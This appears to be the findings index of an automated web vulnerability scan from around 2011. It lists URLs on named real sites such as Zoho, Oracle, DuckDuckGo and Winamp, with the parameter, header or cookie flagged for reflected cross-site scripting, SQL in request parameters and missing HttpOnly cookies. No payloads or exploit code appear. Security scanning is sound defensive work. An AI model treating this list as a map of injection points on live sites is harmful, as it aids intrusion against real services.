1.1. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 1]
1.2. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 2]
1.3. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 3]
1.4. http://bad-behavior.ioerror.us/blog/ [REST URL parameter 1]
1.5. http://bad-behavior.ioerror.us/category/bad-behavior/ [REST URL parameter 2]
1.7. http://bad-behavior.ioerror.us/feed/ [name of an arbitrarily supplied request parameter]
1.8. http://bad-behavior.ioerror.us/feed/atom/ [name of an arbitrarily supplied request parameter]
1.9. https://client.trafficshaping.com/_mint/ [User-Agent HTTP header]
1.10. http://duckduckgo.com/ie/v1/api/oembed [urls parameter]
1.11. http://googleads.g.doubleclick.net/pagead/ads [ga_vid parameter]
1.12. http://googleads.g.doubleclick.net/pagead/ads [u_w parameter]
1.13. http://o.aolcdn.com/os_merge/ [file parameter]
1.14. http://peoplepond.com/_mint/ [MintUnique cookie]
1.15. http://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie]
1.16. http://shop.winamp.com/store [JSESSIONID cookie]
1.17. http://shop.winamp.com/store [Locale parameter]
1.18. http://shop.winamp.com/store [Referer HTTP header]
1.19. http://shop.winamp.com/store [ThemeID parameter]
1.20. http://shop.winamp.com/store [name of an arbitrarily supplied request parameter]
1.21. http://shop.winamp.com/store [productID parameter]
1.22. http://shop.winamp.com/store [s_pers cookie]
1.23. http://shop.winamp.com/store [s_sess cookie]
1.24. https://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie]
1.25. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/QsQtRaU6mGT.css [REST URL parameter 4]
1.27. http://www.companypond.com/ [name of an arbitrarily supplied request parameter]
1.28. http://www.dreamhost.com/r.cgi [129733 parameter]
1.29. http://www.dreamhost.com/r.cgi [name of an arbitrarily supplied request parameter]
1.30. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3]
1.31. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3]
1.32. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3]
2.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [REST URL parameter 1]
2.2. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B4924654.4 [REST URL parameter 1]
2.3. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B5077405.10 [REST URL parameter 1]
2.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
2.5. https://duckduckgo.com/html/ [q parameter]
2.7. http://tacoda.at.atwola.com/rtx/r.js [N cookie]
2.8. http://tacoda.at.atwola.com/rtx/r.js [si parameter]
2.9. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]
2.10. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]
2.11. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]
3. Cross-site scripting (reflected)
3.1. https://accounts.zoho.com/login [serviceurl parameter]
3.2. https://accounts.zoho.com/login [serviceurl parameter]
3.3. https://accounts.zoho.com/register [serviceurl parameter]
3.4. https://accounts.zoho.com/register [serviceurl parameter]
3.5. https://accounts.zoho.com/register [serviceurl parameter]
3.6. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]
3.7. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]
3.8. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]
3.9. http://alterianwaserver.alterianconnect.net/tracking.aspx/gettoken/ [callback parameter]
3.10. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitevents/ [callback parameter]
3.11. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitsession/ [callback parameter]
3.12. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpt parameter]
3.13. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpvc parameter]
3.15. http://api-public.addthis.com/url/shares.json [callback parameter]
3.16. http://api.postup.com/TCTUL001/twidget/1.jsonp [jsonp parameter]
3.17. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter]
3.18. http://b.scorecardresearch.com/beacon.js [c1 parameter]
3.19. http://b.scorecardresearch.com/beacon.js [c10 parameter]
3.20. http://b.scorecardresearch.com/beacon.js [c15 parameter]
3.21. http://b.scorecardresearch.com/beacon.js [c2 parameter]
3.22. http://b.scorecardresearch.com/beacon.js [c3 parameter]
3.23. http://b.scorecardresearch.com/beacon.js [c4 parameter]
3.24. http://b.scorecardresearch.com/beacon.js [c5 parameter]
3.25. http://b.scorecardresearch.com/beacon.js [c6 parameter]
3.40. https://client.trafficshaping.com/signin [email parameter]
3.41. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]
3.42. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]
3.43. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 4]
3.44. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]
3.45. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]
3.46. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]
3.48. http://ds.addthis.com/red/psi/sites/www.capgemini.com/p.json [callback parameter]
3.49. http://ds.addthis.com/red/psi/sites/www.virtusa.com/p.json [callback parameter]
3.50. http://duck.co/ [name of an arbitrarily supplied request parameter]
3.51. http://duck.co/duckduckgo-forum [name of an arbitrarily supplied request parameter]
3.56. http://duck.co/topic/cached-archived-links [name of an arbitrarily supplied request parameter]
3.58. http://duck.co/topic/ddg-gg [name of an arbitrarily supplied request parameter]
3.61. http://duck.co/topic/ddg-own-search-engine [name of an arbitrarily supplied request parameter]
3.63. http://duck.co/topic/default-header-color [name of an arbitrarily supplied request parameter]
3.67. http://duck.co/topic/freenet [name of an arbitrarily supplied request parameter]
3.73. http://duck.co/topic/maps [name of an arbitrarily supplied request parameter]
3.77. http://duck.co/topic/q-html-entities [name of an arbitrarily supplied request parameter]
3.79. http://duck.co/topic/spam-site-found [name of an arbitrarily supplied request parameter]
3.82. http://duck.co/topic/words-to-live-by [name of an arbitrarily supplied request parameter]
3.83. http://duck.co/topic/wot-highlighting [name of an arbitrarily supplied request parameter]
3.84. http://duckduckgo.com/d.js [s parameter]
3.85. http://duckduckgo.com/ie/v1/api/oembed [callback parameter]
3.86. http://duckduckgo.com/ie/v1/api/oembed [maxwidth parameter]
3.87. http://duckduckgo.com/ie/v1/api/oembed [urls parameter]
3.88. http://duckduckgo.com/iq/v1/twitter/cloudscan/services.json [callback parameter]
3.89. http://duckduckgo.com/iq/v1/twitter/cloudscan/services.json [request_id parameter]
3.90. https://duckduckgo.com/e.js [go parameter]
3.91. https://event.on24.com/eventRegistration/EventLobbyServlet [key parameter]
3.92. https://event.on24.com/eventRegistration/EventLobbyServlet [partnerref parameter]
3.93. https://event.on24.com/eventRegistration/EventLobbyServlet [sourcepage parameter]
3.94. http://fonts.googleapis.com/css [family parameter]
3.95. http://init.zopim.com/register [mID parameter]
3.96. http://klout.com/ [name of an arbitrarily supplied request parameter]
3.97. http://klout.com/business [name of an arbitrarily supplied request parameter]
3.98. http://klout.com/perks [name of an arbitrarily supplied request parameter]
3.99. http://lfov.net/webrecorder/g/chimera.js [vid parameter]
3.100. https://login.silverlight.net/login/signin.aspx [returnurl parameter]
3.101. https://login.silverlight.net/login/signin.aspx [returnurl parameter]
3.102. http://odb.outbrain.com/utils/get [callback parameter]
3.103. http://plancast.com/p/3zbp [REST URL parameter 2]
3.104. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]
3.105. http://rapportive.com/stylesheets/jquery.fancybox-1.3.1.css [REST URL parameter 2]
3.106. http://rapportive.com/stylesheets/website_screen.css [REST URL parameter 2]
3.107. https://shop.winamp.com/DRHM/store [name of an arbitrarily supplied request parameter]
3.108. https://shop.winamp.com/store [name of an arbitrarily supplied request parameter]
3.110. https://sso.springsource.com/cas/login [name of an arbitrarily supplied request parameter]
3.114. http://widgets.digg.com/buttons/count [url parameter]
3.115. http://www.business-software.com/top-10-web-content-management-vendors.php [gclid parameter]
3.118. http://www.business-software.com/top-10-web-content-management-vendors.php [track parameter]
3.120. http://www.linkedin.com/cws/share-count [url parameter]
3.121. http://www.montrealkiosk.com/directory.php [categoryId parameter]
3.122. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 1]
3.123. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 1]
3.124. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 2]
3.125. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 2]
3.126. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 3]
3.127. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 3]
3.128. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]
3.129. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]
3.130. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]
3.131. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]
3.132. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]
3.133. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]
3.134. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]
3.135. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]
3.136. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]
3.137. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]
3.138. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]
3.139. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]
3.140. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]
3.141. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]
3.142. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]
3.143. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]
3.144. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]
3.145. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]
3.146. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]
3.147. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]
3.148. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]
3.149. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]
3.150. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]
3.151. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]
3.152. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]
3.153. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]
3.154. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]
3.155. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]
3.156. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]
3.157. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]
3.158. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]
3.159. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]
3.160. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]
3.161. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]
3.162. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]
3.163. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]
3.164. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]
3.165. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]
3.166. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]
3.167. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]
3.168. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]
3.169. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]
3.170. http://www.opengroup.org/favicon.ico [REST URL parameter 1]
3.171. http://www.opengroup.org/favicon.ico [REST URL parameter 1]
3.172. http://www.opengroup.org/member/ [REST URL parameter 1]
3.173. http://www.opengroup.org/member/ [REST URL parameter 1]
3.174. http://www.opengroup.org/member/ [REST URL parameter 1]
3.175. http://www.opengroup.org/togaf/ [REST URL parameter 1]
3.176. http://www.opengroup.org/togaf/ [REST URL parameter 1]
3.177. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]
3.178. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]
3.179. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]
3.180. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]
3.181. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]
3.182. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]
3.183. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [bean parameter]
3.184. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [method parameter]
3.186. http://www.prchecker.info/check_page_rank.php [urlo parameter]
3.187. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3]
3.188. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3]
3.189. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3]
3.190. http://www.virtusa.com/applications/userlogin/userlogin.asp [fn parameter]
3.191. http://www.virtusa.com/common/exitpage.asp [page parameter]
3.192. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 3]
3.193. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 3]
3.194. http://www.watchmouse.com/en/ [REST URL parameter 1]
3.195. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]
3.196. http://www.watchmouse.com/en/api/checkreferrer.php [REST URL parameter 3]
3.197. http://www.winamp.com/media-player/en [REST URL parameter 2]
3.198. http://www.wolframalpha.com/input/ [i parameter]
3.199. http://www.wolframalpha.com/input/ [name of an arbitrarily supplied request parameter]
3.200. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ck parameter]
3.201. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cm parameter]
3.202. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cmp parameter]
3.203. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cr parameter]
3.204. https://www14.software.ibm.com/webapp/iwm/web/signup.do [csr parameter]
3.205. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ct parameter]
3.206. https://www14.software.ibm.com/webapp/iwm/web/signup.do [mkwid parameter]
3.208. http://duckduckgo.com/ [Referer HTTP header]
3.209. http://duckduckgo.com/Assan_language [Referer HTTP header]
3.210. http://duckduckgo.com/Cross-site_scripting [Referer HTTP header]
3.211. http://duckduckgo.com/HTTP_referrer [Referer HTTP header]
3.212. http://duckduckgo.com/Microsoft_Visual_Studio [Referer HTTP header]
3.213. http://duckduckgo.com/NaN [Referer HTTP header]
3.214. http://duckduckgo.com/User_agent [Referer HTTP header]
3.215. http://duckduckgo.com/c/Computer_arithmetic [Referer HTTP header]
3.216. http://duckduckgo.com/c/Computing_acronyms [Referer HTTP header]
3.217. http://duckduckgo.com/c/Software_anomalies [Referer HTTP header]
3.218. http://duckduckgo.com/c/The_Simpsons_characters [Referer HTTP header]
3.219. http://duckduckgo.com/e.js [Referer HTTP header]
3.220. https://duckduckgo.com/ [Referer HTTP header]
3.221. https://duckduckgo.com/Electronic_Frontier_Foundation [Referer HTTP header]
3.222. https://duckduckgo.com/HTTP_Secure [Referer HTTP header]
3.223. https://duckduckgo.com/HTTP_cookie [Referer HTTP header]
3.224. https://duckduckgo.com/IP_Address [Referer HTTP header]
3.225. https://duckduckgo.com/e.js [Referer HTTP header]
3.226. https://duckduckgo.com/e.js [Referer HTTP header]
3.227. https://event.on24.com/eventRegistration/EventLobbyServlet [User-Agent HTTP header]
3.228. https://login.oracle.com/mysso/signon.jsp [Referer HTTP header]
3.229. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Referer HTTP header]
3.230. http://telligent.com/products/request_a_demo.aspx [Referer HTTP header]
3.231. http://telligent.com/resources/m/analysts/1343205.aspx [Referer HTTP header]
3.232. http://telligent.com/resources/m/analysts/1345217.aspx [Referer HTTP header]
3.233. http://telligent.com/resources/m/success_stories/1331597.aspx [Referer HTTP header]
3.234. http://telligent.com/support/request_an_upgrade/ [Referer HTTP header]
3.235. http://www.fusionbot.com/ [Referer HTTP header]
3.236. http://www.virtusa.com/contactus [Referer HTTP header]
3.237. http://www.virtusa.com/contactus/ [Referer HTTP header]
3.238. http://www.virtusa.com/ftbu/contactus/default.asp [Referer HTTP header]
3.239. http://www.watchmouse.com/en/ [Referer HTTP header]
3.240. https://accounts.zoho.com/login [iamcsr cookie]
3.241. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
3.242. http://duck.co/duckduckgo-forum [zdccn cookie]
3.243. http://duck.co/duckduckgo-forum [zdccn cookie]
3.244. http://duck.co/portalLogin.do [zdccn cookie]
3.245. http://duck.co/topic/2-25-news-stories-to-comment-on [zdccn cookie]
3.246. http://duck.co/topic/2-25-news-stories-to-comment-on [zdccn cookie]
3.247. http://duck.co/topic/2-28-articles-to-comment-on [zdccn cookie]
3.248. http://duck.co/topic/2-28-articles-to-comment-on [zdccn cookie]
3.249. http://duck.co/topic/about-com-s-web-search-readers-choice-awards [zdccn cookie]
3.250. http://duck.co/topic/about-com-s-web-search-readers-choice-awards [zdccn cookie]
3.251. http://duck.co/topic/boolean-operators-and-parentheses-for-search-query [zdccn cookie]
3.252. http://duck.co/topic/boolean-operators-and-parentheses-for-search-query [zdccn cookie]
3.253. http://duck.co/topic/cached-archived-links [zdccn cookie]
3.254. http://duck.co/topic/cached-archived-links [zdccn cookie]
3.255. http://duck.co/topic/changing-font-text-and-links [zdccn cookie]
3.256. http://duck.co/topic/changing-font-text-and-links [zdccn cookie]
3.257. http://duck.co/topic/ddg-gg [zdccn cookie]
3.258. http://duck.co/topic/ddg-gg [zdccn cookie]
3.259. http://duck.co/topic/ddg-in-alternative-web-browsers [zdccn cookie]
3.260. http://duck.co/topic/ddg-in-alternative-web-browsers [zdccn cookie]
3.261. http://duck.co/topic/ddg-is-one-of-zoho-s-esteemed-customers [zdccn cookie]
3.262. http://duck.co/topic/ddg-is-one-of-zoho-s-esteemed-customers [zdccn cookie]
3.263. http://duck.co/topic/ddg-own-search-engine [zdccn cookie]
3.264. http://duck.co/topic/ddg-own-search-engine [zdccn cookie]
3.265. http://duck.co/topic/ddg-userbar-to-spread-the-word [zdccn cookie]
3.266. http://duck.co/topic/ddg-userbar-to-spread-the-word [zdccn cookie]
3.267. http://duck.co/topic/default-header-color [zdccn cookie]
3.268. http://duck.co/topic/default-header-color [zdccn cookie]
3.269. http://duck.co/topic/differentiate-duckduckgo-with-other [zdccn cookie]
3.270. http://duck.co/topic/differentiate-duckduckgo-with-other [zdccn cookie]
3.271. http://duck.co/topic/duckduckgo-webs-com-custom-logos [zdccn cookie]
3.272. http://duck.co/topic/duckduckgo-webs-com-custom-logos [zdccn cookie]
3.273. http://duck.co/topic/foss-donation-nominations [zdccn cookie]
3.274. http://duck.co/topic/foss-donation-nominations [zdccn cookie]
3.275. http://duck.co/topic/freenet [zdccn cookie]
3.276. http://duck.co/topic/freenet [zdccn cookie]
3.277. http://duck.co/topic/historical-traffic-stats [zdccn cookie]
3.278. http://duck.co/topic/historical-traffic-stats [zdccn cookie]
3.279. http://duck.co/topic/how-to-get-similar-growth-for-2011 [zdccn cookie]
3.280. http://duck.co/topic/how-to-get-similar-growth-for-2011 [zdccn cookie]
3.281. http://duck.co/topic/i-did-my-own-way-to-promote-ddg [zdccn cookie]
3.282. http://duck.co/topic/i-did-my-own-way-to-promote-ddg [zdccn cookie]
3.283. http://duck.co/topic/i-would-love-it-iff-i-need-ideas-fast-please-click [zdccn cookie]
3.284. http://duck.co/topic/i-would-love-it-iff-i-need-ideas-fast-please-click [zdccn cookie]
3.285. http://duck.co/topic/logging-in-message-email-not-confirmed [zdccn cookie]
3.286. http://duck.co/topic/logging-in-message-email-not-confirmed [zdccn cookie]
3.287. http://duck.co/topic/maps [zdccn cookie]
3.288. http://duck.co/topic/maps [zdccn cookie]
3.289. http://duck.co/topic/opera-thread-include-duckduckgo-in-default-search-engines [zdccn cookie]
3.290. http://duck.co/topic/opera-thread-include-duckduckgo-in-default-search-engines [zdccn cookie]
3.291. http://duck.co/topic/pages-without-favicon-uses-ddg-favicon [zdccn cookie]
3.292. http://duck.co/topic/pages-without-favicon-uses-ddg-favicon [zdccn cookie]
3.293. http://duck.co/topic/post-your-ddg-sticker-photos [zdccn cookie]
3.294. http://duck.co/topic/post-your-ddg-sticker-photos [zdccn cookie]
3.295. http://duck.co/topic/q-html-entities [zdccn cookie]
3.296. http://duck.co/topic/q-html-entities [zdccn cookie]
3.297. http://duck.co/topic/searching-for-roommates-on-craigslist [zdccn cookie]
3.298. http://duck.co/topic/searching-for-roommates-on-craigslist [zdccn cookie]
3.299. http://duck.co/topic/spam-site-found [zdccn cookie]
3.300. http://duck.co/topic/spam-site-found [zdccn cookie]
3.303. http://duck.co/topic/want-more-visitors-ehh-needs-to-look-more-proffesional [zdccn cookie]
3.304. http://duck.co/topic/want-more-visitors-ehh-needs-to-look-more-proffesional [zdccn cookie]
3.305. http://duck.co/topic/words-to-live-by [zdccn cookie]
3.306. http://duck.co/topic/words-to-live-by [zdccn cookie]
3.307. http://duck.co/topic/wot-highlighting [zdccn cookie]
3.308. http://duck.co/topic/wot-highlighting [zdccn cookie]
3.309. http://seg.sharethis.com/getSegment.php [__stid cookie]
3.310. http://REDACTED/iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]
3.311. http://www.winamp.com/ [countryCookie cookie]
3.312. http://www.winamp.com/media-player/en [countryCookie cookie]
3.313. http://www.winamp.com/skin/slick-redux/222084 [countryCookie cookie]
4. SQL statement in request parameter
4.1. http://duckduckgo.com/d.js
4.2. http://www.montrealkiosk.com/directory.php
5.1. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitevents/
5.2. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitsession/
5.3. http://bad-behavior.ioerror.us/2005/05/
5.4. http://bad-behavior.ioerror.us/2005/06/
5.5. http://bad-behavior.ioerror.us/2005/07/
5.6. http://bad-behavior.ioerror.us/2005/08/
5.7. http://bad-behavior.ioerror.us/2005/09/
5.8. http://bad-behavior.ioerror.us/2005/10/
5.9. http://bad-behavior.ioerror.us/2005/11/
5.10. http://bad-behavior.ioerror.us/2005/12/
5.11. http://bad-behavior.ioerror.us/2006/02/
5.12. http://bad-behavior.ioerror.us/2006/04/
5.13. http://bad-behavior.ioerror.us/2006/06/
5.14. http://bad-behavior.ioerror.us/2006/07/
5.15. http://bad-behavior.ioerror.us/2006/08/
5.16. http://bad-behavior.ioerror.us/2006/09/
5.17. http://bad-behavior.ioerror.us/2006/11/
5.18. http://bad-behavior.ioerror.us/2006/12/
5.19. http://bad-behavior.ioerror.us/2007/01/
5.20. http://bad-behavior.ioerror.us/2007/12/
5.21. http://bad-behavior.ioerror.us/2008/01/
5.22. http://bad-behavior.ioerror.us/2008/04/
5.23. http://bad-behavior.ioerror.us/2008/05/
5.24. http://bad-behavior.ioerror.us/2008/07/
5.25. http://bad-behavior.ioerror.us/2008/08/
5.26. http://bad-behavior.ioerror.us/2008/09/
5.27. http://bad-behavior.ioerror.us/2008/11/
5.28. http://bad-behavior.ioerror.us/2009/02/
5.29. http://bad-behavior.ioerror.us/2009/06/
5.30. http://bad-behavior.ioerror.us/2009/09/
5.31. http://bad-behavior.ioerror.us/2009/10/
5.32. http://bad-behavior.ioerror.us/2009/11/
5.33. http://bad-behavior.ioerror.us/category/akismet/
5.34. http://bad-behavior.ioerror.us/category/blog-spam/
5.35. http://bad-behavior.ioerror.us/category/blogging/
5.36. http://bad-behavior.ioerror.us/category/coppermine-photo-gallery/
5.37. http://bad-behavior.ioerror.us/category/drupal/
5.38. http://bad-behavior.ioerror.us/category/expressionengine/
5.39. http://bad-behavior.ioerror.us/category/internet/
5.40. http://bad-behavior.ioerror.us/category/joomla/
5.41. http://bad-behavior.ioerror.us/category/lifetype/
5.42. http://bad-behavior.ioerror.us/category/mediawiki/
5.43. http://bad-behavior.ioerror.us/category/open-source/
5.44. http://bad-behavior.ioerror.us/category/project-honey-pot/
5.45. http://bad-behavior.ioerror.us/category/spam/
5.46. http://bad-behavior.ioerror.us/category/windows/
5.47. http://bad-behavior.ioerror.us/category/wordpress-2-0/
5.48. http://bad-behavior.ioerror.us/category/wordpress-com/
5.49. http://bad-behavior.ioerror.us/category/wordpress/
5.50. http://bh.contextweb.com/bh/set.aspx
5.51. https://communities.oracle.com/portal/server.pt/community/support/219
5.52. https://competencycenter.oracle.com/opncc/home.cc
5.53. http://l.sharethis.com/pview
5.54. https://login.oracle.com/mysso/signon.jsp
5.55. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
5.56. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
5.57. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage
5.58. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo
5.59. http://mt0.googleapis.com/mapslt/ft
5.60. http://server.iad.liveperson.net/hc/43040610/
5.61. http://stackauth.com/auth/global/read
5.62. http://telligent.com/analytics.ashx
5.63. https://twitter.com/oauth/authenticate
5.64. https://twitter.com/oauth/authenticate
5.65. http://www.facebook.com/extern/login_status.php
5.66. http://www.networksolutions.com/domain-name-registration/RV8.jsp
6.1. http://r.nexac.com/e/getdata.xgi [ru parameter]
6.2. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]
6.3. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]
6.4. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]
7. Cookie without HttpOnly flag set
7.1. https://accounts.zoho.com/register
7.2. http://ahmy.yulrizka.com/2011/02/my-own-url-shortening/
7.3. https://communities.oracle.com/portal/server.pt/community/support/219
7.4. http://discuss.zoho.com/getCustomFile.do
7.6. http://duck.co/duckduckgo-forum
7.8. http://duck.co/js/crossdomain.js
7.9. http://duck.co/jsp/i18nConstants.jsp
7.10. http://duck.co/portalLogin.do
7.11. http://duck.co/sendFeedback.do
7.12. http://duck.co/styles/discussions-styles.css
7.13. http://duck.co/styles/editorStyles.css
7.14. http://duck.co/styles/errorpage.css
7.15. http://duck.co/subscribeRegister.do
7.16. http://duck.co/topic/2-25-news-stories-to-comment-on
7.17. http://duck.co/topic/2-28-articles-to-comment-on
7.18. http://duck.co/topic/about-com-s-web-search-readers-choice-awards
7.19. http://duck.co/topic/boolean-operators-and-parentheses-for-search-query
7.20. http://duck.co/topic/cached-archived-links
7.21. http://duck.co/topic/changing-font-text-and-links
7.22. http://duck.co/topic/ddg-gg
7.23. http://duck.co/topic/ddg-in-alternative-web-browsers
7.24. http://duck.co/topic/ddg-is-one-of-zoho-s-esteemed-customers
7.25. http://duck.co/topic/ddg-own-search-engine
7.26. http://duck.co/topic/ddg-userbar-to-spread-the-word
7.27. http://duck.co/topic/default-header-color
7.28. http://duck.co/topic/differentiate-duckduckgo-with-other
7.29. http://duck.co/topic/duckduckgo-webs-com-custom-logos
7.30. http://duck.co/topic/foss-donation-nominations
7.31. http://duck.co/topic/freenet
7.32. http://duck.co/topic/historical-traffic-stats
7.33. http://duck.co/topic/how-to-get-similar-growth-for-2011
7.34. http://duck.co/topic/i-did-my-own-way-to-promote-ddg
7.35. http://duck.co/topic/i-would-love-it-iff-i-need-ideas-fast-please-click
7.36. http://duck.co/topic/logging-in-message-email-not-confirmed
7.37. http://duck.co/topic/maps
7.38. http://duck.co/topic/opera-thread-include-duckduckgo-in-default-search-engines
7.39. http://duck.co/topic/pages-without-favicon-uses-ddg-favicon
7.40. http://duck.co/topic/post-your-ddg-sticker-photos
7.41. http://duck.co/topic/q-html-entities
7.42. http://duck.co/topic/searching-for-roommates-on-craigslist
7.43. http://duck.co/topic/spam-site-found
7.44. http://duck.co/topic/userscript-which-prevents-you-from-accidentally-posting-as-guest
7.45. http://duck.co/topic/want-more-visitors-ehh-needs-to-look-more-proffesional
7.46. http://duck.co/topic/words-to-live-by
7.47. http://duck.co/topic/wot-highlighting
7.48. http://duck.co/topic/ĺ?żĺ?ż
7.49. http://eventreg.oracle.com/webapps/events/ns/EventsDetail.jsp
7.50. http://havefunforever.com/short-urls-with-your-domain-free-url-shortening-script/
